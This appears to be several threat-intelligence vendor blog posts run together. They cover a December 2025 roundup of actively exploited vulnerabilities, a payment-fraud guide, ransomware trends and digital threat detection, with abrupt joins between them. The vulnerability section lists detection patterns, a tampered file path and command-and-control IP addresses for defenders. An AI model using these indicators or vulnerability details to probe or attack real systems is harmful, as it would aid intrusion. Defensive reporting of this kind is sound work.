The quality of threat intelligence directly determines detection effectiveness. Even sophisticated endpoint and network tools require high-fidelity, current threat data to generate value. Security teams have plenty of options for tools; the real challenge is addressing alert fatigue draining analyst time on false positives instead of credible threats.

Recorded Future functions as the continuous intelligence layer strengthening the entire detection stack. Rather than adding another alert-generating tool, it feeds existing security ecosystems with real-time context about ransomware operator behavior.

Real-Time Relevance Through SecOps Intelligence

Every alert that hits your SIEM or endpoint platform gets automatically enriched with real-time risk scores, associated malware and infrastructure, and links to known attacker techniques and campaigns. Security tools can immediately recognize whether an indicator matches an active ransomware operation, cutting triage time from hours to minutes.

Proactive Mitigation Through Vulnerability Intelligence

Recorded Future identifies which vulnerabilities ransomware groups are actually exploiting right now, not just which ones have the highest theoretical severity ratings. This distinction matters because most high-severity vulnerabilities never get exploited in the wild, while some medium-severity vulnerabilities become critical the moment ransomware operators weaponize them.

The platform shows you which vulnerabilities specific ransomware groups are targeting, where exploit code is available, and which vulnerabilities are generating buzz in criminal forums. This lets security teams prioritize patching based on what attackers are actually doing, focusing on the access vectors most likely to result in ransomware incidents.

Victimology and Anticipation

Intelligence about dark web chatter, leak site activity, and victimology patterns reveals which industries, geographies, and technologies are being targeted. When Recorded Future detects increased targeting of specific sectors, SOC analysts can anticipate attack paths, tighten access controls, and implement protective measures before campaigns reach their network.

This closes the gap between reconnaissance and encryption. Most traditional tools don't trigger alerts until ransomware starts encrypting systems, by which point attackers have already stolen data. Intelligence-driven detection can catch the reconnaissance, credential theft, and lateral movement phases that happen first, shifting your response window from reactive damage control to proactive early containment.

Shifting From Reactive Response to Intelligence-Led Prevention

No single tool stops ransomware. The strongest defense is an integrated ecosystem where endpoint detection, network monitoring, and threat analysis platforms work from the same intelligence foundation.

Intelligence elevates these tools from reactive detection to early recognition of adversary behavior during preparation and reconnaissance phases, enabling intervention before ransomware reaches its destructive phase. Organizations that build detection architecture on real-time threat intelligence will adapt as quickly as their adversaries, maintaining effective defenses as the threat landscape evolves.

What security teams need to know:

• React2Shell pandemonium: CVE-2025-55182 triggered a global exploitation wave with multiple threat actors deploying diverse malware families
• China-nexus exploitation intensifies: Earth Lamia, Jackpot Panda, and UAT-9686 leveraged critical flaws for espionage operations
• Public exploits proliferate: Eleven of 22 vulnerabilities have proof-of-concept code available, accelerating exploitation timelines
• Legacy vulnerabilities resurface: CISA added 2018-2022 era flaws to its Known Exploited Vulnerabilities (KEV) catalog, highlighting persistent patch gaps

Bottom line: December's surge reflects both new zero-days and renewed interest in legacy vulnerabilities. React2Shell alone demonstrates how quickly modern web frameworks can become global attack vectors.

Quick Reference Table

All 22 vulnerabilities below were actively exploited in December 2025.

Table 1: List of vulnerabilities that were actively exploited in December based on Recorded Future data (Source: Recorded Future)

Key Trends in December 2025

Affected Vendors

• Fortinet continued vulnerability concerns with two critical authentication bypass flaws
• Google faced three vulnerabilities across Android (2) and Chromium (1) platforms
• Microsoft dealt with a Windows kernel use-after-free vulnerability
• Meta experienced the month's most impactful vulnerability with React2Shell
• Additional affected vendors: Array Networks, Gogs, Gladinet, ASUS, Cisco, Apple, SonicWall, WatchGuard, MongoDB, Digiever, Sierra Wireless, OSGeo, RARLAB, D-Link, and OpenPLC

Most Common Weakness Types

• CWE-22 – Path Traversal
• CWE-347 – Improper Verification of Cryptographic Signature
• CWE-416 – Use After Free
• CWE-434 – Unrestricted Upload of File with Dangerous Type
• CWE-787 – Out-of-bounds Write

Threat Actor Activity

React2Shell exploitation dominated December’s CVE activity:

• Threat actors observed to have exploited this vulnerability:
  • China-nexus actors Earth Lamia and Jackpot Panda
  • China-linked clusters UNC6600, UNC6586, UNC6588, UNC6603, and UNC6595
  • North Korea-linked and financially motivated groups
• Observed payloads included EtherRAT, PeerBlight, CowTunnel, ZinFoq, Kaiji variants, Zndoor, RondoDox, MINOCAT, SNOWLIGHT, COMPOOD, HISONIC, ANGRYREBEL.LINUX, and Weaxor ransomware (using a Cobalt Strike stager)
• Infrastructure connections to HiddenOrbit relay infrastructure and GobRAT relay component

Additional activity:

• UAT-9686 exploited Cisco Secure Email Gateway (CVE-2025-20393), deploying AquaShell, AquaPurge, and AquaTunnel
• Unknown actors leveraged Gogs vulnerability (CVE-2025-8110) for Supershell malware deployment

Priority Alert: Active Exploitation

These vulnerabilities demand immediate attention due to confirmed widespread exploitation.

CVE-2025-55182 | Meta React Server Components (React2Shell)

Risk Score: 99 (Very Critical) | CISA KEV: Added December 5, 2025

Why this matters: Unauthenticated RCE affects React and Next.js, among the world's most popular web frameworks. Multiple threat actors are actively exploiting vulnerable instances with diverse malware payloads.

Affected versions:

• React packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (19.0.0, 19.1.0, 19.1.1, and 19.2.0)
• Next.js: 15.x, 16.x, and Canary builds from 14.3.0-canary.77
• Also affects: React Router, Waku, RedwoodSDK, Parcel, Vite RSC plugin

Immediate actions:

• Upgrade React to 19.0.3, 19.1.4, or 19.2.3 immediately
• Update Next.js to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5
• Monitor for unusual multipart/form-data POST requests consistent with Next.js Server Actions / RSC endpoints
• Check logs for E{"digest" error patterns indicating exploitation attempts
• Review server processes for unexpected Node.js child processes

Exposure: ~310,500 Next.js instances on Shodan (US, India, Germany, Japan, Australia)

Figure 1: Vulnerability Intelligence Card® for CVE-2025-55182 (React2Shell) in Recorded Future (Source: Recorded Future)

CVE-2025-20393 | Cisco Secure Email Gateway

Risk Score: 99 (Very Critical) | Active exploitation by UAT-9686

Why this matters: Chinese threat actors are actively compromising email security infrastructure to establish persistent access and pivot into internal networks.

Affected products: Cisco Secure Email Gateway and Secure Email and Web Manager running AsyncOS

Immediate actions:

• Apply Cisco's security updates immediately
• Monitor Spam Quarantine web interface access logs
• Check for modifications to /data/web/euq_webui/htdocs/index.py
• Hunt for AquaShell, AquaPurge, and AquaTunnel indicators
• Review outbound connections to suspicious IPs

Known C2 infrastructure: 172.233.67.176, 172.237.29.147, 38.54.56.95 (inactive)

• Intelligence drives better decisions. High-performing teams use threat intelligence not just for detection, but to inform strategic business decisions and communicate risk to leadership.
• Maturity means efficiency. Advanced programs focus on automation, high-fidelity indicators, and cross-functional collaboration—freeing analysts to concentrate on strategic initiatives.
• Information overload is the top challenge. Teams need better integrations and AI-powered tools to transform massive data volumes into actionable insights.
• AI will reshape the analyst role. While junior analysts won't be replaced, their workflows will evolve significantly as AI augments their capabilities.

Recorded Future recently hosted two webinars to unpack key insights from the 2025 State of Threat Intelligence Report and hear directly from customers who are putting these findings into practice.

Based on survey responses from 615 cybersecurity executives and practitioners, the report showed clear industry trends. Threat intelligence spending is up, with 76% of organizations spending over $250,000 annually and 91% planning to increase spending in 2026. Even more critically, 87% said they expect to advance the maturity of their threat intelligence programs over the next two years.

But what does maturity actually look like in practice? Our customers offered candid perspectives on how they're turning intelligence into impact.

Intelligence as a strategic asset

Our webinar panelists noted that the availability of rich threat intelligence has transformed how their organizations approach decision-making. According to Jack Watson, Senior Threat Intelligence Analyst at Global Payments, “Understanding that one alert opened and one alert closed does not necessarily equate to one single adversary being stopped” has led his team to take “a much more holistic approach to looking at problems.”

Omkar Nimbalkar, Senior Manager of Cyber Threat Research and Intelligence at Adobe, said, “Once you start doing this work day in and day out, you uncover patterns in your environment. You uncover what your posture looks like, where your true risk resides, and you can use that as a means to inform the business on the changing threat landscape for better decision-making.”

Ryan Boyero, Recorded Future’s Senior Customer Success Manager, said context and storytelling are key benefits of threat intelligence. “You can have a precursor or malicious activity that has occurred,” he said, “but without threat intelligence, you can’t really tell the story or paint the picture to deliver to senior leadership in order to help make the best and informed decisions possible.”

How threat intelligence delivers organization-wide value

Nimbalkar said his team provides tailored threat intelligence to business units and product teams across Adobe so they can monitor for specific behavioral activities and block specific threats in their environments.

Boyero shared that Recorded Future customers in EMEA use threat intelligence to educate leadership. “We're able to inform leaders,” he said. “We're able to speak with executives, get them in the room, not so much scare them that a situation could happen or has happened, but ultimately just educate and let them know that this is what Recorded Future is able to do and how we can bring success to the table.”

Erich Harbowy, Security Intelligence Engineer at Superhuman, said that in addition to educating leaders about risk, his team also uses threat intelligence to show the value of their work. “Not only am I using this very current news, I am also using the statistics that come along with that,” he said. “How much damage occurred during the first attack that was similar to this? And are [my adversaries] done? Are they coming back?”

Harbowy appreciates Recorded Future for providing those insights for postmortems and follow-ups with executives. “How do I prove my worth?” he said. “Give me the intel.”

The anatomy of a mature threat intelligence program

According to Nimbalkar, maturity comes when the foundational tactical and operational work is complete. He said that advancing a threat intelligence program is all about efficiency and optimization, including making sure you have high-fidelity indicators so your noise-to-signal ratio is reduced and you have higher-quality detections, understanding who your adversaries are and how they’re targeting you, getting in front of stakeholders and engaging with cross-functional teams, and collecting metrics on everything you do.

“Once you have figured out all these workflows, automated as much as you can, optimized and made it efficient, and then you focus more on risk reduction across the environment and more on strategic initiatives, that’s a very good maturation,” he said.

Jack Watson of Global Payments described threat intelligence maturity as the ability to ingest and action intelligence. “It’s never been easier to ingest data, but it’s also never been harder to sift through [that data]. So we’re seeing more mature organizations developing automated workflows, developing custom capabilities to do collection and action, and using AI in unique ways.”

Pathways to advancing maturity

Nick Rainho, Senior Intelligence Consultant at Recorded Future, said that the key to advancing maturity is having solid intelligence requirements. “Especially if you’re working with limited resources, go for the low-hanging fruit and ensure that the intelligence you’re pulling in is relevant to senior leadership’s priorities.”

Ryan Boyero agreed that maturity success is predicated on understanding leadership’s key requirements. “And then, how are we able to work towards that greater good and define success together?”

Top challenges for CTI teams

The panelists agreed that information overload is a critical challenge for today’s CTI teams. “More data is better than less,” said Watson, “but you have to be able to whittle it down or it’s useless.”

Nimbalkar said that with new tools in the market, advancements in AI, and the exponential growth in the volume of data, teams need vendors that can provide better integration to make data more actionable. And Rainho agreed, calling for better out-of-the-box integrations between intelligence tools so security teams can consume intelligence in the location and manner that works best for them.

Looking to the future of threat intelligence

When asked how they think the threat landscape will evolve and how technology will evolve with it, the panelists shared a number of predictions. They believe AI will enable CTI teams to fight AI-powered threats at scale. Third-party risk management will become an even more critical discipline for proactive defense. Digital threats will continue to outpace physical threats. And while junior analysts won’t be replaced by AI, their jobs will look very different as they use AI to augment their workflows.

Watch the recordings of the North America and EMEA webinar sessions to learn more, and download the 2025 State of Threat Intelligence Report to see how your peers are evaluating, investing in, and operationalizing threat intelligence.

What Is Payment Fraud?

Payment fraud refers to the theft of money from businesses or individuals through unauthorized transactions or deceptive purchases. Fraudsters may act using their own accounts or by gaining unauthorized access to someone else's account.

While payment fraud can happen in person, online transactions are especially vulnerable. According to Juniper Research, global business losses from online payment fraud are projected to surpass $362 billion between 2023 and 2028. A business's fraud risk depends largely on its industry, the sensitivity of the data it handles, and the payment methods it accepts. The more ways customers can interact with accounts and complete purchases, the more entry points exist for bad actors to exploit.

Different Types of Payment Fraud

Fraudsters use many tactics, and below we list 14 of the most common. Given the large number of threats, businesses must prepare their teams to recognize a variety of warning signs. Strong internal communication policies, clear escalation procedures, and knowledge of the landscape are foundational to any fraud prevention strategy.

1. Phishing

Phishing is a social engineering tactic in which criminals attempt to trick people into revealing sensitive information such as account credentials or payment details. These attacks often come in the form of malicious links sent via email or text, but they can also occur over the phone. Attackers may pose as trusted figures - a friend, a bank representative, or a government official - to manipulate victims.

Prevention tips:

• Let customers know exactly how your business will contact them, including phone numbers and email addresses.
• Be transparent about what information your staff will and will not ask for.
• Alert customers to any known phishing attempts targeting your brand.
• Train employees on information security protocols and how to identify suspicious communications.

2. Credit and Debit Card Fraud

This type of fraud involves obtaining card information - either physically or digitally - and using it to make unauthorized purchases. Cards may be stolen directly, or details may be harvested through card skimming devices installed on ATMs or point-of-sale terminals. Attackers also acquire card data through phishing schemes or by purchasing stolen credentials on the dark web.

Prevention tips:

• Restrict POS system access to authorized personnel and regularly inspect payment hardware for tampering.
• Build secure, encrypted payment pages that comply with data protection standards.
• Offer customers multiple notification options for purchases and account activity.
• Warn customers never to share account or confirmation numbers with unverified sources.

3. Wire Transfer Fraud

In wire transfer fraud, criminals convince victims to send money directly to them. Because wire transfers are difficult to reverse, they are a preferred method among scammers. Attackers commonly impersonate someone the victim trusts - a family member, a company executive, or a business vendor. The use of a convincing back-story is often referred to as "social engineering." For example, an attacker may text employees pretending to be their CEO, claiming an emergency and requesting an urgent fund transfer.

Prevention tips:

• Train employees to spot the signs of social engineering and impersonation.
• Establish official communication channels and avoid conducting financial business over easily spoofed channels like text messages.
• Report and share all phishing attempts with the entire team.

4. Check Fraud

Check fraud involves using counterfeit or altered checks to make payments or writing checks from accounts that lack sufficient funds. Fake checks may be digitally printed or modified versions of real checks. In some cases, the check is genuine but drawn from a closed account.

Prevention tips:

• Implement software that verifies the authenticity of checks.
• Train staff to recognize the visual and physical signs of fraudulent checks.

5. Chargeback and Refund Fraud

Also known as "friendly fraud," chargeback fraud occurs when a customer makes a legitimate purchase and then falsely claims a refund - either directly from the business or through their credit card company. This type of fraud is particularly tricky because it can be hard to distinguish from genuine disputes, especially when delivery or service quality is involved.

Prevention tips:

• Validate customer information, including billing addresses and card security codes.
• Use payment platforms that include fraud protection and dispute automation tools.
• Respond to refund and chargeback requests quickly.
• Minimize legitimate chargebacks by fulfilling orders accurately and on time.

6. Identity Theft

Identity theft happens when a criminal obtains someone's personal information and uses it for financial gain or to make purchases in someone else's name. For businesses, a common result is having to deal with chargebacks after customers discover fraudulent charges on their accounts. Although the primary victim is the customer, businesses have a responsibility to prevent data breaches that expose customer information in the first place.

Prevention tips:

• Train employees to recognize phishing and follow secure information handling practices.
• Ensure your payment systems comply with PCI DSS (Payment Card Industry Data Security Standard) requirements.

7. Account Takeover Fraud

Account takeover (ATO) fraud typically follows identity theft. Once attackers obtain a user's credentials, they change the password and contact information to lock the real owner out. From there, they may use the account for fraudulent purchases or sell it to other bad actors.

Prevention tips:

• Enforce strong password requirements for all accounts.
• Require two-factor authentication (2FA) and send confirmation alerts for any significant account changes.
• Notify customers of purchases and account modifications in real time.

8. New Account Fraud

New account fraud (NAF) occurs when someone uses stolen or fabricated identities to open new lines of credit or accounts. These fraudulent accounts can then be used to make purchases or commit further fraud down the line.

Prevention tips:

• Require multi-factor authentication (MFA) - not just email verification - during account creation.
• Verify address details and card security information during transactions.
• Use fraud protection tools that leverage machine learning to detect unusual account creation patterns.

9. Gift Card Fraud

Gift card fraud is a social engineering scam where criminals pressure victims into purchasing gift cards and handing over the card numbers. Once the numbers are given, the funds are essentially unrecoverable, making this a popular method among scammers.

Prevention tips:

• Display warnings about gift card scams during the checkout process.
• Remind customers never to share gift card numbers with people they don't personally know.
• Educate in-store staff to recognize signs of gift card fraud and when to escalate the situation.

10. Merchant Identity Theft

In merchant identity theft, attackers impersonate legitimate businesses or vendors to defraud customers or partner organizations. They may use phishing to extract employee credentials and gain access to business systems, or they may pose as a trusted vendor and redirect payments to themselves.

Prevention tips:

• Train staff to identify phishing attempts and follow secure communication practices.
• Establish verification procedures when communicating with vendors and business partners.
• Report phishing attempts to employees and partners promptly.

11. Pagejacking and Domain Spoofing

Pagejacking involves cloning an existing webpage and redirecting users to the fake version to steal login credentials or payment information. Domain spoofing follows a similar concept - attackers build an identical-looking site under a slightly different URL. Users are typically directed to these fraudulent pages through malicious emails or texts.

Prevention tips:

• Run plagiarism detection tools to identify duplicate versions of your pages online.
• Pay attention to unusual customer service complaints that might signal a spoofed site.
• Submit takedown requests to search engines if you discover a duplicate site, and notify affected customers.

12. Mobile Payment Fraud

As mobile payments become more prevalent, they've also become a target for fraud. Attackers can exploit mobile apps through malware installation, stolen app credentials, or interception of 2FA codes. For example, a scammer may call a customer pretending to represent a business and ask them to read back a verification code - which is actually a 2FA code the attacker has triggered on the victim's account.

Prevention tips:

• Authenticate customers over the phone carefully to reduce the risk of impersonation-based fraud.
• Monitor for unusual spending or refund activity in mobile transactions.
• Educate customers about the risks of clicking on unknown links, QR codes, or visiting unfamiliar websites.

13. Push Payment Fraud

Unlike unauthorized transaction fraud, push payment fraud involves tricking the victim into willingly sending money to a fraudster. This can take many forms, including phishing, blackmail, or deceptive scenarios like fake emergencies. The key distinction is that the victim actively initiates the transfer.

Prevention tips:

• Clearly communicate to customers what your staff can and cannot ask them to do or pay.
• Make it easy for customers to report anyone impersonating your business.
• Issue proactive alerts about ongoing scam attempts tied to your brand.

14. ACH Payment Fraud

ACH (Automated Clearing House) payment fraud involves criminals gaining unauthorized access to a victim's bank account details and using them to initiate fraudulent transfers. For businesses, this risk can come from both outside attackers and malicious insiders.

Prevention tips:

• Strictly limit and monitor employee access to business bank accounts.
• Educate all staff with account access about phishing tactics and establish firm security policies.

Which Businesses Have the Highest Fraud Risk?

Not all businesses face the same level of exposure. Fraud risk is generally highest in sectors that process online payments, handle sensitive personal data, or still accept paper checks.

E-Commerce Businesses

E-Commerce businesses are particularly vulnerable. Online retail involves accepting payments from a wide range of locations, often with multiple payment methods. Features like peer-to-peer payment integrations or international checkout add more potential points of failure. The more accounts and payment methods a customer has linked, the more attractive a target they become for data breaches.

Healthcare, Banking, and Data-Sensitive Industries

These sectors are at elevated risk because of the high value of the information they store. A breach in these sectors doesn't just expose financial data - it can compromise identity information used to commit fraud across many platforms simultaneously.

Businesses Still Accepting Checks

These kinds of businesses face unique challenges. As check usage declines, employees may become less experienced at identifying fakes, which makes training and verification systems all the more important. According to the Association for Financial Professionals, check fraud remains one of the most common forms of payment fraud.

How to Mitigate Risk

A variety of tools and strategies are available to help businesses identify and reduce fraud exposure. Conducting a security risk assessment is a strong starting point, helping teams understand which vulnerabilities are most critical and where to prioritize investment.

From there, organizations should focus on establishing a solid operational and security foundation before layering in more advanced fraud detection capabilities.

Foundational Controls

These measures create a baseline level of protection by securing systems, safeguarding data, and reducing avoidable losses:

• Strong network and password security: Establish internal policies governing account access, password requirements, and physical access to devices and systems.
• Network tokenization: Ensure payment systems encrypt and tokenize customer data to protect sensitive information.
• PCI standards compliance: Build payment workflows that meet Payment Card Industry (PCI) standards to safeguard cardholder data.
• 3D Secure (3DS) authentication: Use the latest 3DS protocols to validate transactions and verify user identity before completing purchases.
• Chargeback protection: Work with your payment processor to implement tools that help minimize financial losses from disputed transactions.

Once these core protections are in place, businesses can enhance their fraud prevention strategies with more dynamic, data-driven approaches.

Advanced Detection & Optimization

These techniques improve visibility, adaptability, and long-term resilience against evolving fraud tactics:

• Fraud KPI tracking: Monitor key metrics such as dispute rates, authorization rates, and approval/decline ratios to identify trends and respond proactively.
• Rules-based systems: Implement rule-based detection as a reliable operational backbone. While rules require ongoing maintenance, they are especially useful in early stages and can be refined over time.
• Machine learning algorithms: Leverage ML-powered systems to analyze large, complex datasets and uncover patterns that are difficult to detect manually. These models continuously improve as they adapt to new fraud behaviors.

Staying Ahead of Payment Fraud

Payment fraud is an ongoing challenge, but a proactive, layered approach can significantly reduce risk. By combining strong foundational controls with data-driven detection and continuous monitoring, businesses can stay ahead of evolving threats.

Ultimately, effective fraud prevention requires regular review, employee awareness, and a commitment to adapting as tactics change.

Additional Resources

• 2026 AFP Payments Fraud and Control Survey Report
• Learn How Federal Reserve Financial Services Can Help Against Check Fraud
• 47 Cybersecurity Statistics and Facts for 2026
• Beyond Phishing: Exploring the Rise of AI-enabled Cybercrime
• Preventing Fraud
• Top Ten Internal Controls to Prevent And Detect Fraud
• The Escalating Threat of Authorised Push Payment Fraud
• Payment Fraud and How To Fight Back
• A Short Guide for Spotting Phishing Attempts
• Eight Ways to Combat Fraud in The AI Age

• Declining payments, evolving tactics: Ransomware groups made less money in 2025 despite a 47% increase in publicly reported attacks, pushing them to adopt new approaches to extract payment, namely, DDoS-as-a-Service offerings, insider recruitment, and gig worker exploitation.
• Insider threats are rising: With stolen credentials, vulnerability exploitation, and phishing still dominating initial access, ransomware operators are increasingly turning to native English speakers to recruit corporate insiders—a trend likely to accelerate if layoffs continue into 2026.
• Global expansion underway: Recorded Future predicts 2026 will mark the first year that new ransomware actors operating outside Russia outnumber those within it, reflecting the rapid globalization of the ransomware ecosystem.

The ransomware paradox: More attacks, less money

By most accounts, ransomware groups made less money in 2025 than in 2024, both in overall payments and average payment size. This occurred despite a significant increase in attack volume: according to Recorded Future Intelligence, publicly reported attacks rose to 7,200 in 2025 compared to 4,900 in 2024, demonstrating a 47% increase.

For context, Recorded Future classifies both encryption attacks and data theft attacks with an extortion component under the ransomware umbrella. While exact numbers are difficult to isolate, approximately 50% of all attacks we track fall into the data theft and extortion category.

This declining profitability is driving ransomware groups to expand and evolve their tactics. Here are three trends organizations should prepare for heading into 2026.

Trend 1: DDoS services return to the RaaS model

With affiliates earning less and many ransomware operators abandoning the Ransomware-as-a-Service (RaaS) model to operate independently, remaining RaaS operations must offer more value to attract and retain affiliates. One increasingly common differentiator: bundled DDoS services.

The newly formed Chaos ransomware group (distinct from the older group of the same name) exemplifies this trend, providing DDoS capabilities to all affiliates. While this tactic isn't new—for example, REvil previously offered similar services—it fell out of favor for a period. Now, with fewer ransom payments to share, RaaS operators are reintroducing premium services to maintain their affiliate networks.

• What this means for defenders: Organizations should ensure their DDoS mitigation strategies account for attacks that may accompany ransomware incidents. The pressure tactics are becoming multi-pronged.

Trend 2: Insider recruitment attempts are accelerating

Stolen credentials, vulnerability exploitation, and phishing remain by far the most common initial access vectors for ransomware groups, with social engineering as a distant but growing fourth method. However, there has been a notable increase in ransomware groups working with native English speakers to recruit corporate insiders.

The most public example came earlier this year when a ransomware group attempted to recruit a reporter at the BBC. But this represents only the visible tip of a larger trend. Private reporting indicates that insider recruitment attempts increased significantly throughout 2025 and will likely continue growing, especially if workforce reductions at major companies persist into 2026.

• What this means for defenders: Insider threat programs should be evaluated and strengthened. Employee awareness training should address the possibility of external recruitment attempts, and organizations should monitor for anomalous access patterns that could indicate insider-facilitated attacks.

Trend 3: Gig workers as unwitting attack vectors

According to a recent FBI advisory, ransomware groups have begun exploiting gig work platforms to carry out attacks when remote methods fail. In one documented case, an attacker successfully executed a social engineering help desk scam but couldn't install their tools remotely due to security controls. Their solution: recruiting a gig worker through a legitimate platform to physically enter corporate offices and steal data.

The gig worker was unaware they were working for hackers, believing they were performing a legitimate IT task. The targeted employee thought they were assisting someone from the help desk. While this attack vector remains rare, the accessibility and global reach of gig work platforms means other groups could replicate this approach with minimal effort.

• What this means for defenders: Physical security protocols should account for social engineering scenarios involving legitimate-looking third parties. Verification procedures for on-site IT work deserve renewed scrutiny.

Looking ahead: One big prediction for 2026

The ransomware ecosystem has seen tremendous growth among actors and groups operating outside of Russia.

Recorded Future believes that 2026 will be the first year the number of new ransomware actors outside Russia exceeds those emerging within it. This doesn't indicate a decline in Russian-based operations; instead, it reflects how dramatically the global ransomware ecosystem has expanded.

The bottom line: Strengthen your ransomware defenses

Understanding emerging ransomware tactics is the first step toward defending against them. To stay ahead of threat actors and protect your organization:

• Explore Recorded Future's Ransomware Mitigation Solution for end-to-end visibility into your ransomware exposure across the attack lifecycle.
• Read our latest Insikt Group® research on ransomware trends, threat actor TTPs, and emerging attack vectors.
• Download the Proactive Ransomware Mitigation eBook for actionable strategies to identify, investigate, and prioritize cyber threats.

• Digital threats now originate far beyond the perimeter. Identity exposure, brand impersonation, and attacker coordination across the open, deep, and dark webs create risks that traditional tools cannot detect early enough.
• Context is the foundation of effective detection. Raw alerts and isolated indicators offer little clarity. Real-time intelligence turns noise into actionable insight.
• Modern digital threat detection (DTD) requires visibility across the external digital environment. The earliest warning signs of ransomware, credential theft, and phishing campaigns appear long before internal alerts fire.
• Analysts need automation to keep pace. High alert volumes and false positives overwhelm SOC teams. Automated enrichment, correlation, and prioritization significantly reduce investigation time and alert fatigue.
• Recorded Future operationalizes intelligence at enterprise scale. The Intelligence GraphⓇ, Digital Risk Protection, and deep SIEM/SOAR/EDR integrations deliver immediate context, organization-specific visibility, and unified detections, improving time-to-detect, time-to-contain, and overall resilience.

Why Digital Threat Detection Requires a New Approach

Today’s cyber threats evolve too quickly and appear across too many digital touchpoints for isolated tools or static detection rules to keep up. SOC teams must contend with:

• High alert volumes from SIEM, EDR, cloud telemetry, identity systems, and external sources.
• Evolving adversary techniques, including automated attacks and infrastructure that changes by the hour.
• Expanding attack surfaces driven by SaaS adoption, third-party dependencies, social platforms, and cloud-native architectures.
• Alert fatigue from manually sifting through noise to find high-risk signals.

As a result, organizations often struggle to distinguish meaningful threats from the constant noise of daily security events.

Digital threat detection (DTD) addresses this challenge by shifting focus from isolated internal signals to continuous identification, analysis, and prioritization of threats across an organization’s entire digital ecosystem. Unlike traditional perimeter-focused detection, which relies on firewalls, antivirus, and static rules, DTD recognizes that modern threats originate from external infrastructure, supply chains, cloud environments, identities, brand assets, and the open web.

The shift from reactive, point-in-time monitoring toward a proactive, intelligence-led model gives defenders the context they need to understand not just what is happening, but why it’s happening and what to do next. This article will serve as a comprehensive guide for security professionals, defining DTD and exploring the essential tools, methodologies, and practices required to build a proactive and intelligent security program.

Understanding the Modern Digital Threat Landscape

To build an effective digital threat detection program, security teams must understand where modern threats originate and how attackers operate.

Key Threat Vectors Beyond the Perimeter

Leaked credentials and account takeover attempts (stolen identities)

Compromised identities are now the most common entry point for attackers. Credentials harvested from stealer logs, breach dumps, or phishing toolkits often circulate online long before defenders know they’re exposed.

Brand impersonation, domain spoofing, and phishing campaigns

Attackers increasingly weaponize an organization’s public presence and create look-alike domains, fraudulent social profiles, or cloned websites to exploit user trust. These impersonation campaigns often serve as the launchpad for credential harvesting, malware delivery, and social engineering operations.

Vulnerability exploitation and zero-day threats in the external attack surface

Public-facing assets such as web applications, cloud workloads, exposed services, and third-party integrations are constantly probed for misconfigurations and unpatched vulnerabilities.

Dark web chatter and early warning signs of planned ransomware or DDoS attacks

Long before a ransomware deployment or DDoS attack hits production systems, signals often surface in underground communities. Threat actors discuss tools, trade access, or signal interest in specific industries and regions.

Why an Intelligence-Driven Approach is Better

For years, security programs centered their detection efforts on internal activity: log anomalies, endpoint alerts, authentication failures, and other signals that only appear after an attacker is already inside the environment. This approach is inherently reactive. It reveals what is happening within your systems, but not what is forming outside your walls or who may be preparing to target you next.

Digital threat detection reverses that model. Instead of waiting for internal symptoms of compromise, it looks outward at the behaviors and infrastructure, and intent of adversaries operating across the broader digital ecosystem. This expanded perspective allows teams to identify threats earlier in the kill chain, sometimes before any malicious activity reaches corporate networks.

The real advantage comes from context. Raw data on its own is ambiguous: an IP address, a file hash, a domain registration. With intelligence layered on top, those fragments become meaningful. Context exposes intent, and intent enables defenders to prioritize, escalate, or respond with precision rather than guesswork.

Essential Digital Threat Detection Tools and Technologies

Modern digital threat detection depends on a collection of tools that work together to surface early warning signals and provide the context you need to validate threats quickly.

Threat Intelligence Platforms: The Engines of Context

No human team can manually aggregate, cross-reference, and analyze the amount of threat data emerging across the web every minute. A modern threat intelligence platform automates this work, transforming massive volumes of raw, unstructured information into intelligence that analysts can act on immediately.

Threat intelligence platforms collect data from a wide range of external sources and standardize it into a usable format. Sources include:

• Open web reporting
• Underground forums
• Dark web marketplaces
• Malware sandboxes
• Threat feeds
• Researcher data

Once the data is normalized, the platform enriches it with context, such as:

• Relationships between indicators
• Associations with known threat actors
• Infrastructure reuse
• Activity targeting specific industries or regions

This enrichment process turns isolated artifacts into a coherent picture of adversary behavior, revealing intent, relevance, and potential impact in ways raw data alone cannot.

Security Orchestration, Automation, and Response (SOAR)

While threat intelligence provides the context needed to understand potential risks, SOAR platforms help teams take action on that intelligence quickly and consistently. These tools automate routine tasks that would otherwise consume analyst time, ensuring that high-priority threats receive attention without delay.

Key SOAR capabilities include:

• Enriching alerts with additional context from internal systems (SIEM, EDR, IAM, cloud telemetry)
• Blocking malicious indicators across firewalls, endpoints, cloud environments, and identity systems
• Initiating takedown workflows for harmful domains or impersonation infrastructure
• Coordinating actions across multiple security tools to ensure a unified response
• Documenting each step of the investigation for reporting and compliance

By automating the mechanics of response, SOAR platforms allow analysts to focus on higher-value decision making rather than repetitive execution, reducing dwell time and improving overall response efficiency.

Endpoint Detection and Response (EDR) & Security Information and Event Management (SIEM) Integration

EDR and SIEM platforms provide the internal vantage point of a digital threat detection program.

EDR monitors activity directly on endpoints, capturing details such as running processes, file modifications, and other behaviors that may indicate compromise on individual devices. SIEM systems, by contrast, collect and correlate logs from across the entire environment, including authentication systems, cloud services, applications, and network devices.

Together, these tools create a continuous stream of telemetry that reveals what is happening inside the organization, from process activity and login events to cloud logs and network traffic. When this internal data is correlated with intelligence about adversary infrastructure, active campaigns, or malicious tooling observed in the wild, EDR and SIEM can separate routine activity from signs of actual threats.

Modern platforms increasingly apply AI and machine learning to enhance this capability. Instead of relying solely on static signatures or predefined rules, they learn normal behavior across users and systems and identify subtle deviations that signal compromise.

Overcoming the Analyst’s Biggest Pain Points

Today’s threat landscape places enormous pressure on analysts. Internal alerts arrive faster than they can investigate them, and the earliest indicators of an attack often originate in places no traditional tool monitors.

The Drain of Alert Fatigue and False Positives

High alert volumes are a major driver of analyst burnout. Much of the day is spent triaging notifications with little context, forcing analysts to manually determine which events represent real threats and which are routine activity. The repetitive, high-stakes nature of this work is exhausting and increases the likelihood that critical signals will be missed.

The only reliable way to cut through this noise is to improve the quality of context surrounding each alert. When telemetry is paired with intelligence that explains adversary intent, infrastructure, and behavior, analysts can immediately see which signals matter and which can be safely deprioritized.

The Blind Spots of External Risk

Much of the activity that signals an impending attack happens beyond the reach of traditional security monitoring. Early warning signs often surface on the deep and dark webs, in criminal marketplaces, inside closed forums, and across fast-moving social platforms.

These external environments are frequently where the most actionable signals appear first. Credential dumps, access sales, discussions about targeting specific industries, and the creation of malicious infrastructure often occur long before any internal alert fires. Without insight into this external ecosystem, organizations are effectively blind to the earliest stages of an attack. And monitoring these spaces manually is nearly impossible at scale.

Recorded Future: Operationalizing Digital Threat Intelligence at Scale

